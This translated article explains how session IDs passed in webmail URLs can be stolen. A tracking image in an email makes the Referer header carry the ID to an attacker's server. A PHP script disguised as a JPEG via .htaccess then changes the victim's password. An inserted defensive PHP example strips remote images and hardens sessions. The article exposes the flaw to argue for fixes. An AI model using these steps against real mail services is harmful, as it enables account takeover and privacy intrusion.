
A hole in security: postal web-interface

Today I’m going to tell you how addresses can be filched from some webmails. I said ‘can’, not ‘have to’! Calm down, there will be nothing special like ‘tools of a young hacker’ in this article. It is a bare demonstration of PHP’s abilities and of the drawbacks (outrageous ones!) of some webmail interfaces.

The service HotBox.com is described.

The very first test uncovered that the server is exposed to elementary errors in the filtering of scripts and other dangerous tags, but that wasn’t the worst of it.

As mentioned, during a session a user is identified by a random multi-character identifier (ID) and, of course (as I thought), by IP and/or cookies. The test proved that I was wrong! Once an ID value had been discovered, it became possible to enter the mailbox from another address, for instance after the connection had been broken. Even more than that: cookie support wasn’t necessary at all (although, with the ability to execute script, it wasn’t a problem to find the cookies out either).

In fact, for an unauthorised look into a mailbox it’s enough to install an elementary program that logs every request to port 80 (or whatever port is indicated in the address), send a mail containing an unfiltered tag that makes the browser automatically request something from the attacker’s machine (for example, a link to an image supposedly hosted at the attacker’s IP address: <img src=http://address_of_the_hacker’s_machine:port/anyname.gif width=1 height=1>), and after the victim has opened the mail the attacker can read the "Referer:" header of the incoming request:

GET /anyname.gif HTTP/1.0
Referer: http://www.hotbox.ru/message.php?id=b[skip]14cf&index=6&array_index=5
Connection: Keep-Alive
...

All the attacker has to do now is switch off cookie support in his browser, enter the full address indicated in the Referer, and ‘work with the mail’ alongside the owner (read messages, set up forwarding…) until the owner logs out.

If the malefactor has no permanent connection to the net, he can use the holes in tag filtering to set up forwarding by means of scripting (for this he will need to send one more mail containing the confirmation code).

In fact, mailboxes can be broken into in bulk, without waiting for victims to come online.

So we are dealing with a mail service which

  • authorises users with a technology similar to PHP sessions
  • doesn’t validate IP addresses
  • doesn’t check the contents of HTML-formatted mails
  • doesn’t require confirmation of changes to the account settings

And checking the contents should also include ruthlessly cutting out every image that is not attached to the mail but is requested from another address instead. CUT ALL IMAGES LIKE THESE!
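As an added example, not code from the article or from HotBox: a PHP sketch of a webmail doing what is demanded above, keeping the session ID out of links and cutting every image that is not an attachment. The function names and the "cid:" convention for attached images are my assumptions.

```php
<?php
declare(strict_types=1);
// Added example (not the article's code): a webmail closing the gaps listed
// above. (a) The session ID travels only in a cookie, never in a link, and
// the browser is told to send no Referer at all. (b) HTML mail loses every
// image that is not an attachment before it is shown to the reader.

function hardenedSessionStart(): void
{
    // No message.php?id=<session> style links: cookies only, no URL rewriting.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    ini_set('session.use_strict_mode', '1'); // reject IDs the server never issued
    session_set_cookie_params([
        'httponly' => true,  // out of reach of an injected script
        'secure'   => true,  // assumes the webmail is served over HTTPS
        'samesite' => 'Lax',
    ]);
    session_start();
    // Even if a remote image slipped through, the browser sends no Referer.
    header('Referrer-Policy: no-referrer');
}

// Keeps only images shipped with the message itself (MIME "cid:" references,
// an assumption about how the webmail names attachments); anything that
// would be fetched from another host is cut, as the text demands.
function stripRemoteImages(string $html): string
{
    $dom = new DOMDocument();
    libxml_use_internal_errors(true); // real mail is rarely well-formed HTML
    // One wrapping element keeps libxml from reshuffling a bare fragment.
    $dom->loadHTML('<div>' . $html . '</div>', LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    $xpath = new DOMXPath($dom);
    // Copy the list first: removing nodes while walking a live list skips items.
    $nodes = iterator_to_array($xpath->query('//img|//input[@type="image"]'), false);
    foreach ($nodes as $node) {
        $src = trim((string) $node->getAttribute('src'));
        if (stripos($src, 'cid:') !== 0) {
            $node->parentNode->removeChild($node);
        }
    }
    return (string) $dom->saveHTML();
}

// Constructed sample: a greeting card with one attached image and one
// 1x1 image pointing at a foreign host, like the tag quoted in the article.
$sample = '<p>Greetings!</p><img src="cid:card@mail" alt="card">'
        . '<img src="http://attacker.example/anyname.gif" width="1" height="1">';
echo stripRemoteImages($sample);
```

Run it once from the command line to see the foreign image disappear from the sample; hardenedSessionStart() is meant to be called at the top of every page before any output.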

And so, like experienced hackers, we use Apache+PHP.

1. We send HTML-formatted letters containing the tag <img src=http://www.server.com/picture.jpg> to various addresses on the mail service. Such letters may contain, for instance, a greeting card.

2. In the directory with the greeting card we put an .htaccess file with the following content:

<Files "picture.jpg">
ForceType application/x-httpd-php
</Files>

3. Instead of a greeting card we write the file picture.jpg with the following code:

<?php
// Serve the real card so the recipient sees nothing but a picture.
header("Content-type: image/gif");
include("card.jpg");

4. And the greeting card itself is put into the file card.jpg. The ForceType directive in .htaccess makes the server handle the jpg file as a PHP script, which displays the picture to the user once its work is done, so it is impossible to tell that the script has done anything. And the script acts very simply: it takes apart a variable, extracts the session ID from it and deprives the user of his mailbox in one go. Nothing happens on the victim’s machine; everything is done on the hacker’s server.

5. The hacker opens a socket to the webmail, imitating submission of the account settings form (the variable names have to be typed by hand), changes the password to one of his choosing (and, for example, notifies the author that some mailbox has been captured). In order not to arouse suspicion he may forge the necessary headers: Referer, User-Agent and so on.

6. He opens a second socket imitating a press of the ‘logout’ button.

* A socket is a kind of session. In the case given it is the same thing as the connection between web server and browser.

THAT’S ALL! THE USER IS DEPRIVED OF HIS MAILBOX without even having had a good look at the picture. The next message he will see is something like ‘invalid password, try again’.

So a hole in the mail service’s security turns out to be a whole door (I’m not talking about Hotbox.com here, because it is covered somehow). The combination of passing the session ID in a link (i.e. available to anyone through the Referer field) instead of in a cookie, and the absence of IP-address verification, gives the malefactor the ability to seize control of a mailbox quickly and easily. Image checking alone doesn’t help here: nothing prevents inserting into the text of a mail a link which, when clicked, transmits the session ID to the script. Are any conveniences worth such victims? I guess not.
